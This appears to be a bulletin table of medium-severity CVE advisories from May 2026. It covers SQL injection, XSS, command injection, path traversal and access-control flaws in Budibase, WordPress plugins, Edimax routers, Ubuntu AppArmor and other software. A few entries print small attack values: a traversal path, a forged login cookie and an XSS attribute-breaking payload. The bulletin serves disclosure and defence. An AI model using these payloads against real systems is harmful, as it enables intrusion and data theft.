| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.38.1, the V1 Views API (POST /api/views) accepts a calculation parameter from the request body that is interpolated directly into a CouchDB reduce function definition without validation. Although an internal SCHEMA_MAP object defines the valid calculation types (sum, count, stats), no actual validation is performed against this map before the value is used in string interpolation. A user with Builder permissions can inject arbitrary JavaScript code that will be executed within the CouchDB JavaScript engine when the view is queried. This vulnerability is fixed in 3.38.1. | 2026-05-27 | 6.5 | CVE-2026-45719 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.35.4, the buildMatcherRegex() / matches() functions in packages/backend-core/src/middleware/matchers.ts route patterns are compiled into unanchored regular expressions and tested against ctx.request.url, which includes the full query string. The CSRF middleware in the Budibase Worker uses this matching system to decide whether to skip CSRF token validation. An unauthenticated attacker can forge state-changing cross-origin requests against any Worker API endpoint by injecting a public route pattern into the query string, causing the CSRF middleware to skip token validation entirely. This allows actions such as sending admin invites, modifying global configuration, and managing users without a valid CSRF token. This vulnerability is fixed in 3.35.4. | 2026-05-27 | 6.5 | CVE-2026-48147 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.38.1, the row action trigger endpoint (POST /api/tables/:sourceId/actions/:actionId/trigger) fails to validate that the user-supplied rowId is within the scope of the view's row filters. A user with access to a filtered view can trigger row actions on any row in the underlying table, including rows explicitly excluded by the view's security filters. This vulnerability is fixed in 3.38.1. | 2026-05-27 | 5.4 | CVE-2026-45718 |
| Budibase--budibase | Budibase is an open-source low-code platform. Prior to 3.38.2, the public API role unassignment endpoint (POST /api/public/v1/roles/unassign) updates user documents in CouchDB but does not invalidate the corresponding Redis user cache entries. Because the authentication middleware resolves user identity and permissions from this cache (TTL: 3600 seconds), a user whose admin, builder, or app-level roles have been revoked via the public API retains those privileges for up to 1 hour. This vulnerability is fixed in 3.38.2. | 2026-05-27 | 4.2 | CVE-2026-46424 |
| bugsink--bugsink | Bugsink is a self-hosted error tracking tool. Prior to 2.1.3, Bugsink's webhook URL validation could be (partially) bypassed because of a mismatch in URL parsing. The original validation logic parsed webhook URLs with Python's urllib.parse.urlparse, then sent the request with requests.post. For malformed inputs involving backslashes and @, those components can disagree about where the authority ends and which hostname is the real target. A URL may therefore appear to target an allowlisted public hostname during validation, while the HTTP client actually connects to a different host. This vulnerability is fixed in 2.1.3. | 2026-05-26 | 4.3 | CVE-2026-44502 |
| bugsink--bugsink | Bugsink is a self-hosted error tracking tool. Prior to 2.2.0, Bugsink resolved sourcemaps and debug files by debug ID without scoping that lookup to the project that owned the uploaded metadata. An authenticated user with access to one project could cause event processing in that project to use sourcemap/debug-file metadata uploaded for another project in the same Bugsink instance, if the same debug ID was referenced. This vulnerability is fixed in 2.2.0. | 2026-05-26 | 4.3 | CVE-2026-47728 |
| c-rick--jimeng-mcp | A vulnerability has been found in c-rick jimeng-mcp 1.10.0. Affected by this vulnerability is the function getFileContent/uploadCoverFile/generateImage/generateVideo of the file src/api.ts. The manipulation of the argument filePath leads to path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 6.3 | CVE-2026-9473 |
| Canon Inc.--Canon PIXUS iX6800 Series CUPS Printer Driver for macOS | Improper handling of symbolic links in the installer of CUPS Printer Driver for macOS(*) may allow a local attacker with login privileges to exploit a specially crafted symbolic link during installation to modify permissions of directories for which they would not normally have authorization. *:Canon PIXUS iX6800 Series CUPS Printer Driver for macOS Version 16.91.0.0 or earlier (Japan) Canon PIXMA MG2500 Series and iX6800 Series CUPS Printer Driver for macOS Version 16.91.0.0 or earlier (US and Europe) | 2026-05-29 | 5 | CVE-2026-6892 |
| Canon Inc.--My Image Garden for macOS | Improper handling of symbolic links in the installer of My Image Garden for macOS Version 3.6.8 or earlier may allow a local attacker with login privileges to exploit a specially crafted symbolic link during installation to modify permissions of files for which they would not normally have authorization. | 2026-05-28 | 5 | CVE-2026-6891 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8, 6.17 and 7.0 contain AppArmor SAUCE patches which incorrectly attempt to free a pointer which was not previously kmalloc()d, while at the same time leaking allocated memory. The bug can be triggered by an unprivileged local user and can result in the corruption of slab metadata and could lead to resource exhaustion. | 2026-05-28 | 6.1 | CVE-2026-47328 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8, 6.17 and 7.0 contain SAUCE patches with a memory leak in the handling of big responses to AppArmor notifications. The bug can be triggered by an unprivileged local user. The memory leak could lead to resource exhaustion. | 2026-05-28 | 5.5 | CVE-2026-47326 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8, 6.17 and 7.0 contain AppArmor SAUCE patches which incorrectly validate the size of an internal structure, leading to an out-of-bounds read in notification handling code. The bug can be triggered by an unprivileged local user and can result in information disclosure from adjacent slab objects. | 2026-05-28 | 5.5 | CVE-2026-47332 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8, 6.17 and 7.0 contain AppArmor SAUCE patches which incorrectly sleep while holding a spinlock in notification handling code. The bug can be triggered by an unprivileged local user and can result in kernel panic or deadlock. | 2026-05-28 | 5.5 | CVE-2026-47334 |
| Canonical--Ubuntu Linux | Ubuntu Linux 6.8 contains SAUCE patches with a possible NULL pointer dereference in the handling of AppArmor notifications. The bug can be triggered by an unprivileged local user. This can lead to a kernel panic. | 2026-05-28 | 5.5 | CVE-2026-47335 |
| celloexpressions--Content Slideshow | The Content Slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Shortcode Attributes in all versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8873 |
| changmingxie--tcc-transaction | A flaw has been found in changmingxie tcc-transaction up to 2.1.0. This issue affects the function Fastjson.parseObject of the Fastjson AutoType REST API component. Manipulation of its input leads to unsafe deserialization. The attack can be initiated remotely. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 6.3 | CVE-2026-9497 |
| chatwoot--chatwoot | Chatwoot is a customer engagement suite. From 2.14.0 to before 4.13.0, a Pre-Account Takeover (Pre-ATO) vulnerability existed in Chatwoot's authentication flow. Because email confirmation was not enforced before an account became usable, an attacker could pre-register an email address they did not own and set a password. If the legitimate owner of that email later signed in to Chatwoot using Google OAuth (or another OmniAuth provider), the OAuth flow silently confirmed the existing account without invalidating the attacker's pre-set credentials. The attacker could then continue to log in with the password they had originally chosen and access any data the victim subsequently entered into the dashboard, including PII, API keys, and other sensitive information. This vulnerability is fixed in 4.13.0. | 2026-05-26 | 6.8 | CVE-2026-44707 |
| checkpoint--Quantum Security Gateway | When the DLP is active, the UserCheck Web Portal contains an input-handling issue in the UserChoice flow. Under specific conditions, an attacker who can access the UserCheck Ask page could attempt to manipulate the Security Gateway's stored DLP/UserCheck incident information. This could lead to disruptions such as loss of stored incident entries, incorrect handling of pending approvals, or resource impact if the issue is abused repeatedly. Exposure is reduced if the UserCheck Portal is not accessible from untrusted networks. | 2026-05-26 | 5.6 | CVE-2026-48134 |
| checkpoint--Quantum Security Gateway | A Check Point HTTP-based service can incorrectly handle malformed HTTP requests. The issue is related to HTTP request parsing and validation. | 2026-05-26 | 5.3 | CVE-2026-48135 |
| checkpoint--Quantum Security Management | When Compliance is enabled on Check Point Multi-Domain Management, an authenticated administrator with read-write access to one Management Domain (CMA) can modify stored metadata associated with Compliance Best Practices in another Management Domain, where the administrator has no access permissions, bypassing Role-Based Access Control (RBAC). | 2026-05-26 | 4.1 | CVE-2026-48136 |
| clorith--Enable jQuery Migrate Helper | The Enable jQuery Migrate Helper plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the `downgrade_jquery_version()` function in all versions up to, and including, 1.4.1. This is due to the function only verifying a nonce without checking user capabilities. This makes it possible for authenticated attackers, with Subscriber-level access and above, to downgrade the site-wide jQuery version from 3.7.1 to the legacy 1.12.4-wp release, which has known security vulnerabilities. | 2026-05-27 | 6.5 | CVE-2026-3279 |
| Cloud Foundry Foundation--BOSH Director | When the director sends a long-running request (e.g. compile_package), the agent's reply JSON is consumed by AgentClient. inject_compile_log (line 332-339) reads response['value']['result']['compile_log_id'] and format_exception (line 318-325) reads exception['blobstore_id']; both pass the agent-supplied string unmodified to download_and_delete_blob(blob_id) (line 344-349), which calls @resource_manager.get_resource(blob_id) and, in an ensure block, @resource_manager.delete_resource(blob_id). Api::ResourceManager forwards the id straight to blobstore.get(id) / blobstore.delete(id). When the director is configured with the local blobstore provider, Blobstore::LocalClient#object_file_path(oid) is File.join(@blobstore_path, oid) (local_client.rb:54-56) with no normalisation, so oid = "../../jobs/director/config/director.yml" resolves outside the blobstore root. Affected versions: BOSH Director: All versions prior to v282.1.12 | 2026-05-27 | 5.8 | CVE-2026-41009 |
| Cloud Foundry Foundation--BOSH Director | AgentClient#handle_method (lines 264-303) processes every NATS reply. It calls inject_compile_log (line 273) on every response, which reads response['value']['result']['compile_log_id'] (line 332-338) and passes it to download_and_delete_blob. Separately, any response containing 'exception' goes through format_exception (lines 308-325), which reads exception['blobstore_id'] and also calls download_and_delete_blob. That helper (lines 344-349) calls ResourceManager#get_resource(blob_id) and, in an ensure block, ResourceManager#delete_resource(blob_id). ResourceManager (resource_manager.rb:62-70) calls blobstore.delete(id) on the single shared Director blobstore with no UUID-format check, no ownership check, and no namespace prefix. Affected versions: BOSH Director: All versions prior to v282.1.12 | 2026-05-27 | 5 | CVE-2026-41704 |
| cloudways--Breeze Cache | The Breeze plugin for WordPress is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor in all versions up to, and including, 2.5.2. This is due to improper verification of the `wordpress_logged_in_` cookie in the `inc/cache/execute-cache.php` file when the "Cache Logged-in Users" setting is enabled. The plugin parses the username directly from the cookie value (e.g., `username|hash`) using `substr()` to retrieve the corresponding cache file but fails to verify the session's cryptographic signature or validity with WordPress core. This makes it possible for unauthenticated attackers to supply a crafted cookie (e.g., `wordpress_logged_in_fake=admin|fake`) to trick the plugin into serving the cached HTML content generated for an administrator, leading to the disclosure of sensitive information such as private posts (including their full content), the Admin Bar, WordPress nonces, and other data visible only to logged-in administrators or other users. | 2026-05-29 | 5.3 | CVE-2026-2128 |
| code-projects--Employee Management System | A vulnerability was identified in code-projects Employee Management System 1.0. This impacts an unknown function of the file /changepassemp.php. The manipulation leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. | 2026-05-25 | 6.3 | CVE-2026-9449 |
| code-projects--Employee Management System | A security flaw has been discovered in code-projects Employee Management System 1.0. Affected is an unknown function of the file /psubmit.php. The manipulation of the argument pid results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. | 2026-05-25 | 6.3 | CVE-2026-9450 |
| code-projects--Employee Management System | A weakness has been identified in code-projects Employee Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /process/applyleaveprocess.php. This manipulation of the argument ID causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-25 | 6.3 | CVE-2026-9451 |
| code-projects--Employee Management System | A weakness has been identified in code-projects Employee Management System 1.0. This affects an unknown function of the file /eloginwel.php. This manipulation of the argument ID causes cross site scripting. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. | 2026-05-25 | 4.3 | CVE-2026-9415 |
| code-projects--Employee Management System | A security vulnerability has been detected in code-projects Employee Management System 1.0. This impacts an unknown function of the file /myprofile.php. Such manipulation of the argument ID leads to cross site scripting. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2026-05-25 | 4.3 | CVE-2026-9416 |
| code-projects--Employee Management System | A vulnerability was detected in code-projects Employee Management System 1.0. Affected is an unknown function of the file /myprofileup.php. Performing a manipulation of the argument ID results in cross site scripting. The attack is possible to be carried out remotely. The exploit is now public and may be used. | 2026-05-25 | 4.3 | CVE-2026-9417 |
| code-projects--Employee Management System | A flaw has been found in code-projects Employee Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /changepassemp.php. Executing a manipulation of the argument ID can lead to cross site scripting. The attack may be performed from remote. The exploit has been published and may be used. | 2026-05-25 | 4.3 | CVE-2026-9418 |
| code-projects--Employee Management System | A vulnerability has been found in code-projects Employee Management System 1.0. Affected by this issue is some unknown functionality of the file /empproject.php. The manipulation of the argument ID leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2026-05-25 | 4.3 | CVE-2026-9419 |
| code-projects--Employee Management System | A vulnerability was determined in code-projects Employee Management System 1.0. This affects an unknown function of the file /applyleave.php. Executing a manipulation of the argument ID can lead to cross site scripting. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. | 2026-05-25 | 4.3 | CVE-2026-9448 |
| code-projects--Online Music Site | A vulnerability has been found in code-projects Online Music Site 1.0. This affects an unknown part of the file /Administrator/PHP/AdminUpdateAlbum.php. Such manipulation of the argument ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2026-05-31 | 4.7 | CVE-2026-10171 |
| code-projects--Visitor Management System | A flaw has been found in code-projects Visitor Management System 1.0. Affected by this issue is some unknown functionality of the file /vms/php/phone_0.php. This manipulation of the argument phone causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. | 2026-05-31 | 6.3 | CVE-2026-10170 |
| CodeAstro--Leave Management System | A weakness has been identified in CodeAstro Leave Management System 1.0. The affected element is an unknown function of the file /admin/add_staff.php. Executing a manipulation of the argument email_id can lead to sql injection. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-26 | 6.3 | CVE-2026-9542 |
| codycave--Endless Scroll | The Endless Scroll plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Shortcode Attributes in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8703 |
| Convers Lab--WPSubscription | Cross-Site Request Forgery (CSRF) vulnerability in Convers Lab WPSubscription allows Cross Site Request Forgery. This issue affects WPSubscription: from n/a through 1.9.1. | 2026-05-25 | 4.3 | CVE-2026-24554 |
| Cornel Raiu--WP Search Analytics | Missing Authorization vulnerability in Cornel Raiu WP Search Analytics allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Search Analytics: from n/a before 1.5.0. | 2026-05-25 | 5.3 | CVE-2026-27357 |
| creativemindssolutions--CM Ad Changer A simple tool to control and optimize your site's banners | The CM Ad Changer - A simple tool to control and optimize your site's banners plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.7. This is due to missing or incorrect nonce validation on the cmac_campaigns_action function. This makes it possible for unauthenticated attackers to permanently delete arbitrary advertising campaigns, including their associated banner records and uploaded files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-27 | 4.3 | CVE-2026-9236 |
| creaweb2b--Simple Divi Shortcode | The Simple Divi Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter of the [showmodule] shortcode in versions up to, and including, 1.2. This is due to insufficient input sanitization and output escaping in the showmodule_shortcode() function, which concatenates the 'id' shortcode attribute directly into a dynamically constructed shortcode string without applying esc_attr() or any escaping, allowing an attacker to break out of the attribute context and inject arbitrary HTML. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-29 | 6.4 | CVE-2026-9714 |
| croixhaug--Appointment Booking Calendar Simply Schedule Appointments Booking Plugin | The Appointment Booking Calendar - Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.6.11.8 due to the plugin not properly verifying that a user is authorized to perform an action via the bulk appointments REST API endpoint. This makes it possible for unauthenticated attackers to modify arbitrary appointment records including customer PII, payment status, and meeting URL fields, and to expose full customer PII from existing appointment records via the bulk endpoint response. The public nonce is a static, user-independent value present in the HTML source of any page hosting the [ssa_booking] shortcode, meaning any visitor who has viewed such a page can obtain it and target any appointment in the system without authentication. | 2026-05-28 | 5.3 | CVE-2026-6937 |
| croixhaug--Appointment Booking Calendar Simply Schedule Appointments Booking Plugin | The Appointment Booking Calendar - Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to denial of service in all versions up to, and including, 1.6.11.5. This is due to a publicly accessible REST API endpoint (/wp-json/ssa/v1/async) that calls PHP's sleep() function on a user-supplied delay parameter without any rate limiting. This makes it possible for unauthenticated attackers to exhaust PHP worker processes, denying access to the site to legitimate users. | 2026-05-27 | 5.3 | CVE-2026-7493 |
| cryptoprijzen--Cryptocurrency Prijsvergelijking Widget | The Cryptocurrency Prijsvergelijking Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting in version 1.0. This is due to insufficient output escaping in the as_get_coin_shortcode() function, which renders the 'width' (and 'height') shortcode attribute directly into the style attribute of an <iframe> element without applying any escaping function such as esc_attr(). An attacker-controlled value like '100px;"onload="alert(1)" x="' terminates the style attribute prematurely and injects an arbitrary HTML attribute into the iframe tag. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8698 |
| cuamckuy--Easy Prism Syntax Highlighter | The Easy Prism Syntax Highlighter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'code' (and 'c') shortcode in versions up to, and including, 1.0.2. This is due to insufficient input sanitization and output escaping on user supplied shortcode attributes in the shortcode() function, which concatenates the first positional attribute directly into the class attribute of the generated <pre>/<code> HTML without calling esc_attr() or any other escaping function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8875 |
| cyberhobo--Geo Mashup | The Geo Mashup plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.13.19. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to read sensitive plugin configuration data, including Google Maps API keys and GeoNames service credentials. | 2026-05-28 | 5.3 | CVE-2026-7552 |
| czlonkowski--n8n-mcp | n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. Prior to 2.51.3, the workflow telemetry sanitizer could retain partial fragments of URL-shaped node parameters before sending workflow data to the project's anonymous telemetry backend. Values placed in HTTP-Request-style node parameters - such as customer or tenant identifiers, short secrets embedded in query strings, and signed request parameters - could therefore appear in stored telemetry, contrary to the collection boundary documented in PRIVACY.md. This vulnerability is fixed in 2.51.3. | 2026-05-29 | 6.5 | CVE-2026-45582 |
| DALIBO--PostgreSQL Anonymizer | PostgreSQL Anonymizer contains a vulnerability that allows a user to gain superuser privileges by creating a table and placing malicious code inside a column identifier. If a superuser calls the k-anonymity function, the malicious code is executed with superuser privileges. The risk is higher with PostgreSQL 14 or with instances upgraded from PostgreSQL 14 or a prior version. With PostgreSQL 15 and later, the creation permission on the public schema is revoked by default and this exploit can only be achieved by a user who was explicitly granted the CREATE TABLE privilege. The problem is resolved in PostgreSQL Anonymizer 3.1.0 and later versions. | 2026-05-27 | 6.8 | CVE-2026-9617 |
| Danelec--MacGregor Voyage Data Recorder (VDR) G4e | The administrator account for the Danelec MacGregor Voyage Data Recorder web interface can directly edit sensitive files related to authentication, potentially changing the root password. | 2026-05-29 | 5.7 | CVE-2026-40425 |
| Danelec--MacGregor Voyage Data Recorder (VDR) G4e | An authenticated user can download a backup of the Danelec MacGregor Voyage Data Recorder device which includes account data and password hashes. | 2026-05-29 | 5.4 | CVE-2026-42951 |
| Danelec--MacGregor Voyage Data Recorder (VDR) G4e | Danelec MacGregor Voyage Data Recorder passwords are stored with a hashing method which limits password length and is susceptible to brute force attacks. | 2026-05-29 | 5.4 | CVE-2026-44611 |
| DataDog--guarddog | GuardDog is a CLI tool to identify malicious PyPI packages. From 2.6.0 to 2.9.0, GuardDog includes attacker-controlled filenames, file locations, messages, and code snippets in its default human-readable output without escaping terminal control characters. A malicious package can therefore inject ANSI or OSC escape sequences into analyst terminals or CI logs. | 2026-05-27 | 5 | CVE-2026-44972 |
| dattateccom--EnvíaloSimple: Email Marketing y Newsletters | The EnvíaloSimple: Email Marketing y Newsletters plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'orderby' parameter in all versions up to, and including, 2.4.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2026-05-27 | 4.9 | CVE-2026-7618 |
| davidanderson--Easy Updates Manager | The Easy Updates Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'paged' parameter in versions up to, and including, 9.0.20. This is due to insufficient input sanitization and output escaping in the pagination() function. This makes it possible for attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, granted they can trick an administrator into performing an action such as clicking on a link. | 2026-05-28 | 6.1 | CVE-2026-7660 |
| dazeb--cline-mcp-memory-bank | A security flaw has been discovered in dazeb cline-mcp-memory-bank up to 55c81b9cf6c16700983c84dc4cdea3cafa19a75f. The affected element is the function handleInitializeMemoryBank of the file src/index.ts. The manipulation of the argument projectPath results in path traversal. The attack may be performed from remote. The exploit has been released to the public and may be used for attacks. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 6.3 | CVE-2026-9468 |
| dazeb--markdown-downloader | A flaw has been found in dazeb markdown-downloader up to 3d4394b34b6c99d81af817623af55e3384df5a6a. Affected is the function download_markdown/list_downloaded_files/create_subdirectory of the file src/index.ts. Executing a manipulation can lead to path traversal. The attack can be launched remotely. The exploit has been published and may be used. This product does not use versioning, so information about affected and unaffected releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-25 | 6.3 | CVE-2026-9472 |
| DearHive--DearFlip | Missing Authorization vulnerability in DearHive DearFlip allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects DearFlip: from n/a through 2.4.27. | 2026-05-27 | 4.3 | CVE-2026-49047 |
| debugmcp--mcp-debugger | A vulnerability was identified in debugmcp mcp-debugger up to 0.20.0. Impacted is the function handleGetSourceContext of the file src/server.ts. The manipulation leads to path traversal. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 4.3 | CVE-2026-9467 |
| devitemsllc--ShopLentor All-in-One WooCommerce Growth & Store Enhancement Plugin | The ShopLentor - WooCommerce Builder for Elementor & Gutenberg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'blockUniqId' block attribute in multiple Product Grid blocks in versions up to, and including, 3.3.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 5.4 | CVE-2026-6287 |
| dkjensen--Splide Carousel Block | The Splide Carousel Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'url' Block Attribute in all versions up to, and including, 1.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The injected payload must be published before it executes for site visitors, which requires an editor or administrator to approve and publish the contributor's post. | 2026-05-27 | 6.4 | CVE-2026-9022 |
| Dolibarr--ERP CRM | A vulnerability has been found in Dolibarr ERP CRM 23.0.0/23.0.1/23.0.2. The affected element is an unknown function of the file htdocs/user/messaging.php. Such manipulation of the argument ID leads to authorization bypass. The attack can be executed remotely. Upgrading to version 23.0.3 is sufficient to fix this issue. The name of the patch is 119b3606c7a701747a57a1f18b1a9e7666f678e2. It is suggested to upgrade the affected component. | 2026-05-30 | 4.3 | CVE-2026-10154 |
| Dromara--lamp-cloud | A vulnerability has been found in Dromara lamp-cloud up to 5.6.2. Impacted is the function GroovyClassLoader.parseClass of the component Message Template Handler. Such manipulation of the argument DefMsgTemplate.content leads to improper neutralization of special elements used in a template engine. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 6.3 | CVE-2026-9498 |
| DTStack--Taier | A vulnerability has been found in DTStack Taier 1.4.0. This affects the function Runtime.exec of the component REST API. The manipulation of the argument sqlText leads to os command injection. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 6.3 | CVE-2026-9437 |
| Dylan Kuhn--Geo Mashup | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Dylan Kuhn Geo Mashup allows Stored XSS. This issue affects Geo Mashup: from n/a through 1.13.18. | 2026-05-26 | 6.5 | CVE-2026-27427 |
| e107inc--e107 | e107 is a content management system (CMS). Prior to 2.3.4, a Broken Access Control vulnerability exists in the application, allowing an unauthorized authenticated user to edit comments posted by others. This stems from inadequate server-side access control validation, where the application depends only on a predictable identifier in the request to determine which comment to edit, without confirming the requesting user's ownership of the comment. This vulnerability is fixed in 2.3.4. | 2026-05-26 | 6.5 | CVE-2026-43934 |
| e107inc--e107 | e107 is a content management system (CMS). Prior to 2.3.5, e107 CMS does not properly enforce CSRF token validation on comment moderation actions. The problem comes down to how session_handler::check() handles CSRF tokens. Instead of requiring a token on every state-changing request, it only validates the token if one happens to be present. If there is no token at all, the check is skipped entirely. This vulnerability is fixed in 2.3.5. | 2026-05-26 | 6.5 | CVE-2026-46620 |
| e107inc--e107 | e107 is a content management system (CMS). Prior to 2.3.4, you can access the local environment by specifying the URL of the local environment from "Image/File URL:" of "From a remote location" in "Media Manager" on the administrator screen. This vulnerability is fixed in 2.3.4. | 2026-05-26 | 4.3 | CVE-2026-43936 |
| Edimax--BR-6478AC | A weakness has been identified in Edimax BR-6478AC 1.23. This affects the function formStaDrvSetup of the file /goform/formStaDrvSetup of the component POST Request Handler. This manipulation of the argument rootAPmac causes command injection. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. | 2026-05-30 | 6.3 | CVE-2026-10127 |
| Edimax--BR-6478AC | A vulnerability was determined in Edimax BR-6478AC 1.23. The affected element is the function formWlbasic of the file /goform/formWlbasic of the component POST Request Handler. This manipulation of the argument rootAPmac causes command injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-31 | 6.3 | CVE-2026-10166 |
| Edimax--BR-6478AC | A vulnerability was identified in Edimax BR-6478AC 1.23. Affected by this vulnerability is the function formAccept of the file /goform/formAccept of the component POST Request Handler. Such manipulation of the argument submit-url leads to command injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 6.3 | CVE-2026-9440 |
| Edimax--BR-6478AC | A security flaw has been discovered in Edimax BR-6478AC 1.23. Affected by this issue is the function formiNICbasic of the file /goform/formiNICbasic of the component POST Request Handler. Performing a manipulation of the argument rootAPmac results in command injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 6.3 | CVE-2026-9441 |
| Edimax--BR-6675nD | A vulnerability was determined in Edimax BR-6675nD 1.12. Affected is the function stainfo of the file /goform/stainfo. This manipulation of the argument interface causes command injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 6.3 | CVE-2026-9439 |
| Edimax--BR-6675nD | A security flaw has been discovered in Edimax BR-6675nD 1.12. Impacted is the function mp of the file /goform/mp of the component POST Request Handler. Performing a manipulation of the argument command results in command injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 4.7 | CVE-2026-9423 |
| Edimax--EW-7438RPn | A weakness has been identified in Edimax EW-7438RPn 1.31. The affected element is the function formWlanMP of the file /goform/formWlanMP of the component Content-Type Handler. Executing a manipulation of the argument ateFunc/ateGain/ateTxCount/ateChan/ateRate/ateMacID/e2pTxPower1/e2pTxPower2/e2pTxPower3/e2pTxPower4/e2pTxPower5/e2pTxPower6/e2pTxPower7/e2pTx2Power1/e2pTx2Power2/e2pTx2Power3/e2pTx2Power4/e2pTx2Power5/e2pTx2Power6/e2pTx2Power7/ateTxFreqOffset/ateMode/ateBW/ateAntenna/e2pTxFreqOffset/e2pTxPwDeltaB/e2pTxPwDeltaG/e2pTxPwDeltaMix/e2pTxPwDeltaN/readE2P can lead to os command injection. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-25 | 6.3 | CVE-2026-9424 |
| ektorcaba--WP Iframe Geo Style for Amazon affiliates | The WP Iframe Geo Style for Amazon affiliates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'adid' Shortcode Attribute in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8837 |
| Elastic--Kibana | Uncontrolled Resource Consumption (CWE-400) in Kibana can lead to a denial of service via Excessive Allocation (CAPEC-130). An authenticated user holding a low-privileged role can submit a specially crafted, oversized payload to an internal Kibana API, causing the Kibana process to exhaust available resources and become unresponsive to all users until the service recovers or is restarted. | 2026-05-28 | 6.5 | CVE-2026-33464 |
